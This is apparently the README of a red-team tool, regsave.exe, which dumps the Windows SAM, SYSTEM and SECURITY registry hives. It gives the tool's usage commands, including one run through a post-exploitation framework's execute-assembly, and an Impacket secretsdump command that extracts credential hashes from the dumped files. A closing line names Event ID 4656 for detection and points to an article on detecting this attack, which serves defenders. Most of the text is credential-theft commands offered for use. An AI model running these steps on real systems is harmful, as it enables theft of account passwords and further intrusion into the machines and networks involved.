A .NET 3.5 application that will dump SAM / SYSTEM / SECURITY registry keys to a path of your choosing.
regsave.exe c:\Users\USER\Appdata\Local
execute-assembly /opt/CS/toolkit/regsave.exe c:\Users\USER\Appdata\Local
Collect the files and then parse them with Impacket secretsdump
secretsdump.py -sam samantha.txt -security secundum.txt -system systemless.txt LOCAL
Look for Event ID 4656 after configuring audit policy.
More info at Detecting Attempts to steal passwords from the registry